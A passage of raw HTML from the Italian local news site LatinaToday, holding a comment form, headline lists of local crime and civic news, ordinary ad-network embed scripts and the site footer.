                        </div>

                        <!--
                        <div styl class="form-group"  id="commentReplyHomePageBox_0"  style="display:none;">

                            <input placeholder="Home Page" class="form-control" id="commentReplyHomePage_0" type="text" value="" title="Home Page" maxlength="4096" />

                            <div id="commentReplyHomePageError_0" style="display:none;" class="commento_over_error"></div>
                        </div>

                        <div class="form-group">
                            <input  placeholder="Titolo" class="form-control" id="commentReplyTitle_0" type="text" value="" title="Titolo del commento" maxlength="65535" />

                            <div id="commentReplyTitleError_0" style="display:none;" class="commento_over_error"></div>
                        </div>
                        -->

                        <div style="display:none;">
                          <div class="form-group"  id="commentReplyVoteBox_0" style="display:none;">


                            <div title="Avatar" class="commento_reply_avatars_area">
                                                          <input id="commentReplyVoteNumber-1_0" class="form-control" type="radio" name="vote" value="1" checked="checked" />

                              <div class="commento_over_avatar">
                                <label for="commentReplyVoteNumber-1_0">1<!--<img src="http://2.citynews.stgy.ovh/~shared/images/avatars/1.gif" alt="Avatar anonimo #1" />--></label>
                              </div>
                                                           <input id="commentReplyVoteNumber-2_0" class="form-control" type="radio" name="vote" value="2" />

                              <div class="commento_over_avatar">
                                <label for="commentReplyVoteNumber-2_0">2<!--<img src="http://1.citynews.stgy.ovh/~shared/images/avatars/2.gif" alt="Avatar anonimo #2" />--></label>
                              </div>
                                                           <input id="commentReplyVoteNumber-3_0" class="form-control" type="radio" name="vote" value="3" />

                              <div class="commento_over_avatar">
                                <label for="commentReplyVoteNumber-3_0">3<!--<img src="http://2.citynews.stgy.ovh/~shared/images/avatars/3.gif" alt="Avatar anonimo #3" />--></label>
                              </div>
                                                           <input id="commentReplyVoteNumber-4_0" class="form-control" type="radio" name="vote" value="4" />

                              <div class="commento_over_avatar">
                                <label for="commentReplyVoteNumber-4_0">4<!--<img src="http://1.citynews.stgy.ovh/~shared/images/avatars/4.gif" alt="Avatar anonimo #4" />--></label>
                              </div>
                                                           <input id="commentReplyVoteNumber-5_0" class="form-control" type="radio" name="vote" value="5" />

                              <div class="commento_over_avatar">
                                <label for="commentReplyVoteNumber-5_0">5<!--<img src="http://3.citynews.stgy.ovh/~shared/images/avatars/5.gif" alt="Avatar anonimo #5" />--></label>
                              </div>
                                                           <input id="commentReplyVoteNumber-6_0" class="form-control" type="radio" name="vote" value="6" />

                              <div class="commento_over_avatar">
                                <label for="commentReplyVoteNumber-6_0">6<!--<img src="http://3.citynews.stgy.ovh/~shared/images/avatars/6.gif" alt="Avatar anonimo #6" />--></label>
                              </div>
                                                         </div>

                            <div id="commentReplyVoteError_0" style="display:none;" class="commento_over_error"></div>
                          </div>
                        </div>

                        <div class="form-group" >

                            <textarea placeholder="Commento"  id="commentReplyContent_0" class="form-control" rows="10" cols="60" title="Testo del commento"></textarea>
                            <div id="commentReplyContentError_0" style="display:none;" class="commento_over_error"></div>
                        </div>

                        <div class="form-group" id="commentReplyCaptchaBox_0" style="display:none;">

                            <label>Trascrivi questo codice</label>
                            <div class="commenta_captcha">
                              <img id="commentReplyCaptchaImage_0" alt="Codice di Controllo" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="bs_icCaptcha" />
                              <a id="commentReplyCaptchaRefresh_0" onclick="return false;" href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#" class="bs_icCaptchaRefresh"><b>Aggiorna il codice di controllo</b></a>

                              <input id="commentReplyCaptcha_0" type="text" value="" maxlength="255" />
                              <div id="commentReplyCaptchaError_0" style="display:none;" class="commento_over_error"></div>
                            </div>

                         </div>


                         <input type="submit" value="Pubblica Commento" title="Pubblica Commento" class="btn btn-lg btn-block primary-btn" />
                         <div id="commentReplyError_0" style="display:none;" class="commento_over_error"></div>


                        <!-- /div -->

                     </form>

               </div>




                </div>
              </div>
            </div>


            <!-- more comments... -->
                          <a id="commentUrl_0" class="commenti_vedi_tutti" title="Commenti meno recenti" href="/commenti/articoli/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018/198268" style="display:none;"  rel="nofollow" >Commenti meno recenti</a>
            

            <!-- pager -->
            

            <!-- dialog -->
            <div id="commentDialogBox_0" class="modal fade" style="display:none;">
              <div class="dialog-modal">
                <div class="modal-content">
                    <div class="modal-header">
                      <button type="button" class="close" data-dismiss="modal"  aria-hidden="true" aria-label="Close"><svg class="icon cross-icon medium"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#icon-cross"></use></svg></button>

                      <div class="commentDialogText modal-title" id="commentDialogText_0"></div>
                    </div>
                </div>
              </div>

            </div>


            <!-- flag -->
            <div id="commentFlagBox_0" style="display:none;" class="modal modal-sm fade" role="dialog">
            <form id="commentFlagForm_0"  action="" onsubmit="return false;">
              <div class="modal-dialog" role="document">

                <div class="modal-content">
                  <div class="modal-header">
                    <button type="button" class="btn close-btn" data-dismiss="modal" aria-label="Close">
                      <svg class="icon close-icon medium">
                        <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#close-icon"></use>
                      </svg>
                    </button>
                    <h3 class="modal-title" id="myModalLabel">Aiutaci a capire il problema</h3>
                  </div>


                  <div class="modal-body">
                  

                    <div id="commentFlagError_0" class="alert alert-error" style="display:none;"></div>


                    <div class="form-group" >
                      <label for="commentFlagReason_0">Perché?</label>
                      <div class="form-select">
                       <select class="form-control" id="commentFlagReason_0">
                         <option selected="selected" value=""></option>
                         <option>Contenuto inappropriato</option>
                         <option>Contenuto che incita al razzismo</option>
                         <option>Contenuto che incita alla violenza</option>
                         <option>Contenuto sessualmente esplicito</option>
                         <option>Materiale protetto da copytight</option>
                         <option>Spam o scam/truffa</option>
                         <option>Contenuto non attinente</option>
                         <option>Altro motivo</option>
                       </select>
                     </div>
                    </div>
                  

                  </div>

                  <div class="modal-footer">
                    <button type="submit" class="btn btn-lg btn-block primary-btn">Invia segnalazione</button>
                  </div>
                </div>
              </div>
             </form>             
            </div> <!--end modal -->
          </div>
      </div>
    </div>
  </div>
</section>






<section class="section top-stories">
  <div class="line">

    <div class="unit size1of1">
      <div class="section-title has-no-border">
        <h2 class="section-heading">Notizie di oggi</h2>
      </div>
    </div>
  </div>

  <div class="line">
    <ul class="u-unstyled u-bordered l-row multirow" id="special_featureds">
                 
      
  <li class="unit size1of4 l-row-item l-row--item-span-1">
    <article class="story featured-story">
  
              <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-responsive"&gt;&lt;a href="/cronaca/controlli-nas-chiuso-laboratorio-pasticceria-latina.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://1.citynews-latinatoday.stgy.ovh/~media/horizontal-low/29318514482777/carabinieri_nas-2-3.jpg" media="(min-width: 46.25em)"&gt; &lt;img srcset="http://1.citynews-latinatoday.stgy.ovh/~media/square-low/29318514482777/carabinieri_nas-2-3.jpg" alt="Ispezioni del Nas, pessime condizioni igieniche: a Latina chiuso un laboratorio di pasticceria"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>        
      <header class="story-header">
  
               <span class="label theme-color">
          <a href="/cronaca/" class="link">
            Cronaca          </a>
        </span>
          
        <h3 class="story-heading heading-std">
          <a href="/cronaca/controlli-nas-chiuso-laboratorio-pasticceria-latina.html" class="link">
            Ispezioni del Nas, pessime condizioni igieniche: a Latina chiuso un laboratorio di pasticceria          </a>
        </h3>

      </header>
  
    </article>
  
  
  </li>
     
      
  <li class="unit size1of4 l-row-item l-row--item-span-1">
    <article class="story featured-story">
  
              <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-responsive"&gt;&lt;a href="/cronaca/operazione-mosaico-interrogatorio-arrestati.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://3.citynews-latinatoday.stgy.ovh/~media/horizontal-low/50964302946473/operazione-mosaico-arresti-4-2.jpg" media="(min-width: 46.25em)"&gt; &lt;img srcset="http://3.citynews-latinatoday.stgy.ovh/~media/square-low/50964302946473/operazione-mosaico-arresti-4-2.jpg" alt="Terrorismo, operazione Mosaico: gli arrestati in silenzio davanti al Gip"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>        
      <header class="story-header">
  
               <span class="label theme-color">
          <a href="/cronaca/" class="link">
            Cronaca          </a>
        </span>
          
        <h3 class="story-heading heading-std">
          <a href="/cronaca/operazione-mosaico-interrogatorio-arrestati.html" class="link">
            Terrorismo, operazione Mosaico: gli arrestati in silenzio davanti al Gip          </a>
        </h3>

      </header>
  
    </article>
  
  
  </li>
     
      
  <li class="unit size1of4 l-row-item l-row--item-span-1">
    <article class="story featured-story">
  
              <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-responsive"&gt;&lt;a href="/cronaca/rida-chiusa-soluzione-emergenza-latina.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://3.citynews-latinatoday.stgy.ovh/~media/horizontal-low/67741643734898/rifiuti_via_monti_lettrice-2.jpg" media="(min-width: 46.25em)"&gt; &lt;img srcset="http://1.citynews-latinatoday.stgy.ovh/~media/square-low/67741643734898/rifiuti_via_monti_lettrice-2.jpg" alt="Rifiuti, Rida chiusa per tre giorni da oggi: il Comune di Latina trova una soluzione"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>        
      <header class="story-header">
  
               <span class="label theme-color">
          <a href="/cronaca/" class="link">
            Cronaca          </a>
        </span>
          
        <h3 class="story-heading heading-std">
          <a href="/cronaca/rida-chiusa-soluzione-emergenza-latina.html" class="link">
            Rifiuti, Rida chiusa per tre giorni da oggi: il Comune di Latina trova una soluzione          </a>
        </h3>

      </header>
  
    </article>
  
  
  </li>
     
      
  <li class="unit size1of4 l-row-item l-row--item-span-1">
    <article class="story featured-story">
  
              <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-responsive"&gt;&lt;a href="/cronaca/precari-asl-latina-respinto-ricorso-tar.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://1.citynews-latinatoday.stgy.ovh/~media/horizontal-low/69460255680633/ospedale-goretti-latina-2.jpeg" media="(min-width: 46.25em)"&gt; &lt;img srcset="http://2.citynews-latinatoday.stgy.ovh/~media/square-low/69460255680633/ospedale-goretti-latina-2.jpeg" alt="Precari Asl, il Tar rigetta il ricorso. L&amp;#039;azienda: &amp;quot;Si lavora comunque a una soluzione&amp;quot;"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>        
      <header class="story-header">
  
               <span class="label theme-color">
          <a href="/cronaca/" class="link">
            Cronaca          </a>
        </span>
          
        <h3 class="story-heading heading-std">
          <a href="/cronaca/precari-asl-latina-respinto-ricorso-tar.html" class="link">
            Precari Asl, il Tar rigetta il ricorso. L&#039;azienda: &quot;Si lavora comunque a una soluzione&quot;          </a>
        </h3>

      </header>
  
    </article>
  
  
  </li>
            </ul>
  </div>
</section>



<section class="section most-read">
  <div class="line">
    <div class="unit size1of1">
      <div class="section-title theme-color">
        <h2 class="section-heading">I più letti della settimana</h2>
      </div>
    </div>
  </div>
    <div class="line">
    
              <ul class="u-unstyled u-bordered unit size1of2">
          <li  >

    <article class="story">


      
        <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-sm"&gt;&lt;div class="number"&gt;1&lt;/div&gt;&lt;a href="/cronaca/estrazione-superenalotto-27-marzo-2018-numeri.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://1.citynews-latinatoday.stgy.ovh/~media/horizontal-low/1619427072178/superenalotto-2-2.jpg" media="(min-width: 62.5em)"&gt; &lt;img srcset="http://2.citynews-latinatoday.stgy.ovh/~media/square-low/1619427072178/superenalotto-2-2.jpg" alt="Superenalotto, 27 marzo 2018: un&amp;rsquo;altra estrazione con jackpot da record"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>      
      <h4 class="story-heading heading-xs">
        <a class="link" href="/cronaca/estrazione-superenalotto-27-marzo-2018-numeri.html">
          Superenalotto, 27 marzo 2018: un&rsquo;altra estrazione con jackpot da record        </a>
      </h4>

    </article>
  </li>
  <li  >

    <article class="story">


      
        <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-sm"&gt;&lt;div class="number"&gt;2&lt;/div&gt;&lt;a href="/cronaca/carabinieri-nuovi-comandanti-terracina-latina-priverno.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://3.citynews-latinatoday.stgy.ovh/~media/horizontal-low/22235430493953/carabinieri_bencivenga_terracina_calabresi_latina-2.jpg" media="(min-width: 62.5em)"&gt; &lt;img srcset="http://2.citynews-latinatoday.stgy.ovh/~media/square-low/22235430493953/carabinieri_bencivenga_terracina_calabresi_latina-2.jpg" alt="Carabinieri: nuovi arrivi a Latina, Terracina e Priverno. Presentati tre comandanti"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>      
      <h4 class="story-heading heading-xs">
        <a class="link" href="/cronaca/carabinieri-nuovi-comandanti-terracina-latina-priverno.html">
          Carabinieri: nuovi arrivi a Latina, Terracina e Priverno. Presentati tre comandanti        </a>
      </h4>

    </article>
  </li>
  <li class="not-last" >

    <article class="story">


      
        <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-sm"&gt;&lt;div class="number"&gt;3&lt;/div&gt;&lt;a href="/cronaca/terrorismo-arresti-latina.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://1.citynews-latinatoday.stgy.ovh/~media/horizontal-low/51755046751917/operazione-mosaico-arresti-3-2.jpg" media="(min-width: 62.5em)"&gt; &lt;img srcset="http://1.citynews-latinatoday.stgy.ovh/~media/square-low/51755046751917/operazione-mosaico-arresti-3-2.jpg" alt="Operazione antiterrorismo, 5 arresti. Perquisizioni anche a Latina"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>      
      <h4 class="story-heading heading-xs">
        <a class="link" href="/cronaca/terrorismo-arresti-latina.html">
          Operazione antiterrorismo, 5 arresti. Perquisizioni anche a Latina        </a>
      </h4>

    </article>
  </li>
          </ul>
        <ul class="most-read u-unstyled u-bordered unit size1of2">
          <li  >

    <article class="story">


      
        <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-sm"&gt;&lt;div class="number"&gt;4&lt;/div&gt;&lt;a href="/cronaca/accoltellato-via-romagnoli-latina.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://2.citynews-latinatoday.stgy.ovh/~media/horizontal-low/45091773899445/accoltellamento-3.jpg" media="(min-width: 62.5em)"&gt; &lt;img srcset="http://1.citynews-latinatoday.stgy.ovh/~media/square-low/45091773899445/accoltellamento-3.jpg" alt="Lite e accoltellamento in strada, aggressori in fuga. Indagini della polizia"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>      
      <h4 class="story-heading heading-xs">
        <a class="link" href="/cronaca/accoltellato-via-romagnoli-latina.html">
          Lite e accoltellamento in strada, aggressori in fuga. Indagini della polizia        </a>
      </h4>

    </article>
  </li>
  <li  >

    <article class="story">


      
        <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-sm"&gt;&lt;div class="number"&gt;5&lt;/div&gt;&lt;a href="/cronaca/incidente-stradale/via-bassianese-latina-conducente-positivo-narcotest.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://3.citynews-latinatoday.stgy.ovh/~media/horizontal-low/30612198363058/incidente_bassianese_21_03_18-2.jpg" media="(min-width: 62.5em)"&gt; &lt;img srcset="http://1.citynews-latinatoday.stgy.ovh/~media/square-low/30612198363058/incidente_bassianese_21_03_18-2.jpg" alt="Medico morto nello schianto sulla Bassianese, l&amp;#039;altro conducente positivo al narcotest"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>      
      <h4 class="story-heading heading-xs">
        <a class="link" href="/cronaca/incidente-stradale/via-bassianese-latina-conducente-positivo-narcotest.html">
          Medico morto nello schianto sulla Bassianese, l&#039;altro conducente positivo al narcotest        </a>
      </h4>

    </article>
  </li>
  <li class="not-last" >

    <article class="story">


      
        <script type="text/async-html" data-async-html-on-viewport="1">&lt;figure class="story-media media-sm"&gt;&lt;div class="number"&gt;6&lt;/div&gt;&lt;a href="/cronaca/ritrovate-terracina-minorenni-scomparse.html" class="link"&gt;&lt;picture&gt;&lt;source srcset="http://2.citynews-latinatoday.stgy.ovh/~media/horizontal-low/40856778065450/auto_polizia-2-2.jpg" media="(min-width: 62.5em)"&gt; &lt;img srcset="http://3.citynews-latinatoday.stgy.ovh/~media/square-low/40856778065450/auto_polizia-2-2.jpg" alt="Studentesse scomparse a Frosinone, ritrovate dalla polizia in un camping a Terracina"&gt;&lt;/picture&gt;&lt;/a&gt;&lt;/figure&gt;
</script>      
      <h4 class="story-heading heading-xs">
        <a class="link" href="/cronaca/ritrovate-terracina-minorenni-scomparse.html">
          Studentesse scomparse a Frosinone, ritrovate dalla polizia in un camping a Terracina        </a>
      </h4>

    </article>
  </li>
          </ul>
      
    </div>
</section>      </div>
      
              
                 
            
            
                
  <script type="text/async-html">&lt;div align="center" class="nomobile" style="margin:5px 0px 10px 0px;clear:both;padding-top:5px;"&gt;&lt;script language="JavaScript" type="text/javascript"&gt;
    rp_account   = '12470';
    rp_site      = '49192';
    rp_zonesize  = '222808-2';
    rp_adtype    = 'iframe';
    rp_width     = '728';
    rp_height    = '90';
    rp_smartfile = '[SMART FILE URL]';
    
          
      
    rp_inventory = {city : "latinatoday", category : ",sport," } ; 
      &lt;/script&gt; &lt;script type="text/javascript" src="http://ads.rubiconproject.com/ad/12470.js"&gt;&lt;/script&gt;&lt;/div&gt;
</script>

                
        
                  


 <div data-revive-format="poll" class="slot-poll" style="text-align:center;"><script type="text/revive-ad" data-revive-ad="2467" data-revive-format="poll" data-revive-target=""></script><noscript><a href='http://adv.strategy.it/www/delivery/ck.php?n=a081a4a7&amp;cb=2015093730' target='_blank'><img src='http://adv.strategy.it/www/delivery/avw.php?zoneid=2467&amp;cb=2015093730&amp;n=a081a4a7' border='0' alt='' /></a></noscript></div>
  
                
                 


 <div data-revive-format="floorad" class="slot-floorad" style="text-align:center;"><script type="text/revive-ad" data-revive-ad="2775" data-revive-format="floorad" data-revive-target=""></script><noscript><a href='http://adv.strategy.it/www/delivery/ck.php?n=a2be5443&amp;cb=318819567' target='_blank'><img src='http://adv.strategy.it/www/delivery/avw.php?zoneid=2775&amp;cb=318819567&amp;n=a2be5443' border='0' alt='' /></a></noscript></div>
  
      	 


 <div data-revive-format="adv_bar" class="slot-adv_bar" style="text-align:center;"><script type="text/revive-ad" data-revive-ad="5855" data-revive-format="adv_bar" data-revive-target=""></script></div>
  
                    

      
<a class="back-to-top-link" href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#top">
 Torna su
 <svg class="icon small top-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#top-icon"></use></svg>
</a>
<footer class="site-footer">

  <div class="line">
    <div class="unit size1of4 footer-col footer-list-link is-desktop">
      <div class="site-brand">
        

<svg class="logo" width="340px" height="50px" viewBox="0 0 340 50" version="1.1" xmlns="http://www.w3.org/2000/svg">
    <title>latinatoday-web</title>
    <path d="M193.289189,6.24271968 L193.289189,3.24324324 L166.497297,3.24324324 L166.497297,11.8837838 L175.386486,11.8837838 L175.386486,46.7567568 L184.4,46.7567568 L184.4,11.8837838 L189.823229,11.8837838 C190.695163,9.53073275 191.858699,7.66919499 193.289189,6.24271968 L193.289189,6.24271968 Z M302.881081,31.2162162 L313.883784,3.24324324 L304.621622,3.24324324 L300.456757,15.2405405 C299.524324,17.9135135 298.840541,20.3378378 298.778378,20.4 L298.52973,20.4 C298.467568,20.3378378 297.783784,17.9135135 296.913514,15.1783784 L292.872973,3.24324324 L282.616216,3.24324324 L293.805405,31.2162162 L293.805405,46.7567568 L302.881081,46.7567568 L302.881081,31.2162162 Z M191.051351,24.9378378 C191.051351,41.6594595 197.081081,47.5648649 207.027027,47.5648649 C217.097297,47.5648649 223.064865,41.472973 223.064865,25.0621622 C223.064865,8.4027027 217.035135,2.43513514 207.027027,2.43513514 C197.018919,2.43513514 191.051351,8.46486486 191.051351,24.9378378 Z M200.375676,24.8756757 C200.375676,14.3702703 202.551351,11.1378378 207.089189,11.1378378 C211.502703,11.1378378 213.740541,14.3081081 213.740541,25.1243243 C213.740541,35.7540541 211.502703,38.8621622 207.089189,38.8621622 C202.551351,38.8621622 200.375676,35.6297297 200.375676,24.8756757 Z M226.794595,3.24324324 L226.794595,46.7567568 L240.656757,46.7567568 C251.783784,46.7567568 256.445946,38.6756757 256.445946,25.1864865 C256.445946,11.4486486 251.472973,3.24324324 240.283784,3.24324324 L226.794595,3.24324324 Z M235.87027,38.1162162 L235.87027,11.8837838 L239.537838,11.8837838 C244.510811,11.8837838 247.183784,14.9918919 247.183784,25.4351351 C247.183784,34.7594595 244.510811,38.1162162 239.413514,38.1162162 L235.87027,38.1162162 Z M276.586486,39.1108108 L277.954054,46.7567568 L287.464865,46.7567568 L278.327027,3.24324324 L265.397297,3.24324324 L256.259459,46.7567568 L265.459459,46.7567568 L266.764865,39.1108108 L276.586486,39.1108108 Z M275.094595,30.7189189 L268.256757,30.7189189 L270.183784,19.8405405 C270.867568,15.9864865 271.551351,11.8837838 271.551351,11.8216216 L271.8,11.8216216 C271.862162,11.8837838 272.483784,16.0486486 273.167568,19.9027027 L275.094595,30.7189189 Z" class="logo-network"></path>
    <path d="M1.56571429,47 L24.6342857,47 L24.6342857,38.2628571 L10.7428571,38.2628571 L10.7428571,3 L1.56571429,3 L1.56571429,47 Z M47.3257143,39.2685714 L48.7085714,47 L58.3257143,47 L49.0857143,3 L36.0114286,3 L26.7714286,47 L36.0742857,47 L37.3942857,39.2685714 L47.3257143,39.2685714 Z M45.8171429,30.7828571 L38.9028571,30.7828571 L40.8514286,19.7828571 C41.5428571,15.8857143 42.2342857,11.7371429 42.2342857,11.6742857 L42.4857143,11.6742857 C42.5485714,11.7371429 43.1771429,15.9485714 43.8685714,19.8457143 L45.8171429,30.7828571 Z M83.4685714,11.7371429 L83.4685714,3 L56.3771429,3 L56.3771429,11.7371429 L65.3657143,11.7371429 L65.3657143,47 L74.48,47 L74.48,11.7371429 L83.4685714,11.7371429 Z M87.0514286,47 L96.2285714,47 L96.2285714,3 L87.0514286,3 L87.0514286,47 Z M121.811429,47 L131.114286,47 L131.114286,3 L122.314286,3 L122.314286,17.96 C122.314286,23.6171429 122.377143,28.4571429 122.377143,28.52 L122.188571,28.52 L110.434286,3 L101.131429,3 L101.131429,47 L109.931429,47 L109.931429,32.9828571 C109.931429,27.8285714 109.868571,22.4857143 109.868571,22.4228571 L110.057143,22.4228571 L121.811429,47 Z M154.811429,39.2685714 L156.194286,47 L165.811429,47 L156.571429,3 L143.497143,3 L134.257143,47 L143.56,47 L144.88,39.2685714 L154.811429,39.2685714 Z M153.302857,30.7828571 L146.388571,30.7828571 L148.337143,19.7828571 C149.028571,15.8857143 149.72,11.7371429 149.72,11.6742857 L149.971429,11.6742857 C150.034286,11.7371429 150.662857,15.9485714 151.354286,19.8457143 L153.302857,30.7828571 Z" class="logo-edition"></path>
</svg>
      </div>
      
      <ul class="u-unstyled list-link">
        <li><a class="link" href="http://www.citynews.it/azienda/citta/latinatoday" rel="nofollow">Presentazione</a></li>
        <li><a class="link" href="/signup/register/" rel="nofollow">Registrati</a></li>
        <li><a class="link" href="http://www.citynews.it/faq/privacy/privacy" rel="nofollow">Privacy</a></li>
        <li><a class="link" href="/social/contribuisci/" rel="nofollow">Invia Contenuti</a></li>
        <li><a class="link" href="http://www.citynews.it/faq/indice" rel="nofollow">Help</a></li>
        <li><a class="link" href="http://www.citynews.it/termini-servizio" rel="nofollow">Condizioni Generali</a></li>               
      </ul>
      <a role="button" href="http://www.citynews.it/azienda/pubblicita/" class="btn btn-sm default-btn inverse-btn">Per la tua pubblicità</a>
    </div>
    
    <div class="unit size1of4 footer-col footer-list-link footer-nav">
      <h5 class="footer-col-title theme-color">Canali</h5>
      
      <ul class="u-unstyled list-link">
        
                  <li><a class="link" href="/cronaca/">Cronaca</a></li>
          <li><a class="link" href="/sport/">Sport</a></li>
          <li><a class="link" href="/politica/">Politica</a></li>
          
                      <li><a class="link" href="/economia/">Economia e Lavoro</a></li>
            <li><a class="link" title ="News auto e moto" href="http://www.today.it/motori">Motori</a></li>
            <li><a class="link" href="/eventi/">Cosa fare in città</a></li>
            <li><a class="link" href="/notizie/">Zone</a></li>
            <li><a class="link" href="/social/segnalazioni/">Segnalazioni</a></li>
                    
              </ul>
    </div>
    
    <div class="unit size1of4 footer-col footer-site-link is-desktop">
      
      <h5 class="footer-col-title theme-color">Altri siti</h5>
      
            <img class="footer-network-map" src="http://2.citynews.stgy.ovh/~shared/images/v4/elementi/mappa-centro.gif" alt="Altri siti del Centro Italia" />
            
      <ul class="u-unstyled list-link">
                
        <li><a class="link" href="http://www.romatoday.it/" rel="nofollow">RomaToday</a></li>
        
                
        <li><a class="link" href="http://www.perugiatoday.it/" rel="nofollow">PerugiaToday</a></li>
        
                
        <li><a class="link" href="http://www.napolitoday.it/" rel="nofollow">NapoliToday</a></li>
        
                
        <li><a class="link" href="http://www.anconatoday.it/" rel="nofollow">AnconaToday</a></li>
        
                
        <li><a class="link" href="http://www.ilpescara.it/" rel="nofollow">IlPescara</a></li>
        
         
        
      </ul>
        </div>
    
    <div class="unit size1of4 footer-col footer-col-social">
      <h5 class="footer-col-title theme-color">Apps & Social</h5>
      <ul class="u-unstyled inline-list">
                
        <li>
          <a href="https://www.facebook.com/pages/LatinaToday/128888647217934" rel="nofollow"><svg class="icon large top-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#facebook-circle-icon"></use></svg></a>
        </li>
                        <li>
          <a href="http://twitter.com/latinatoday" rel="nofollow"><svg class="icon large top-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#twitter-circle-icon"></use></svg></a>
        </li>
                <li>
          <a href="/rss/" rel="nofollow"><svg class="icon large feed-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#feed-icon"></use></svg></a>
        </li>
      </ul>
      
      
    
      <div class="footer-app-links is-desktop">   
        
                 <a class="link" href="https://itunes.apple.com/it/app/latinatoday/id1203758708?mt=8" rel="nofollow" ><img src="http://1.citynews.stgy.ovh/~shared/images/v2015/icons/badge-apple.svg" alt="Download LatinaToday Apple AppStore iOS, iPhone, iPad, iPod"></a>
                
                 <a class="link" href="https://play.google.com/store/apps/details?id=it.citynews.latinatoday" rel="nofollow"><img src="http://3.citynews.stgy.ovh/~shared/images/v2015/icons/badge-google.png" alt="Download LatinaToday Google PlayStore Android"></a> 
             </div>
      
    </div>
  </div> 
  
  
  <div class="line">
    <div class="unit size1of1 footer-note">
      <!-- div class="company-logo hidden-xs hidden-sm">
        <img class="logo" src="http://3.citynews.stgy.ovh/~shared/images/brand/citynews/cn-horizontal-alpha-simple.png" alt="Citynews">
      </div -->
      <div class="network dropup ">    
        <a title="LatinaToday" href="http://www.citynews.it/" class="dropdown-toggle" data-toggle="dropdown" aria-expanded="false">
          <div class="company-logo">
            <img class="logo" src="http://3.citynews.stgy.ovh/~shared/images/brand/citynews/cn-horizontal-alpha-simple.png" height="32px" alt="Citynews">
            <span class="icon caret caret-icon small"></span>
          </div>
        </a>
        <ul aria-labelledby="dropdownMenu" role="menu" class="dropdown-menu network-dropdown">
          
<li class="network-item"> <a tabindex="-1" href="http://www.agrigentonotizie.it/" title="cronaca Agrigento"><b>Agrigento</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.anconatoday.it/" title="cronaca ancona"><b>Ancona</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.avellinotoday.it/" title="cronaca Avellino"><b>Avellino</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.baritoday.it/" title="cronaca Bari"><b>Bari</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.bolognatoday.it/" title="cronaca Bologna"><b>Bologna</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.bresciatoday.it/" title="cronaca Brescia"><b>Brescia</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.brindisireport.it/" title="cronaca Brindisi"><b>Brindisi</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.casertanews.it/" title="cronaca Caserta"><b>Caserta</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.cataniatoday.it/" title="cronaca Catania"><b>Catania</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.cesenatoday.it/" title="cronaca Cesena"><b>Cesena</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.chietitoday.it/" title="cronaca Chieti"><b>Chieti</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.quicomo.it/" title="cronaca Como"><b>Como</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.firenzetoday.it/" title="cronaca Firenze"><b>Firenze</b></a></li>
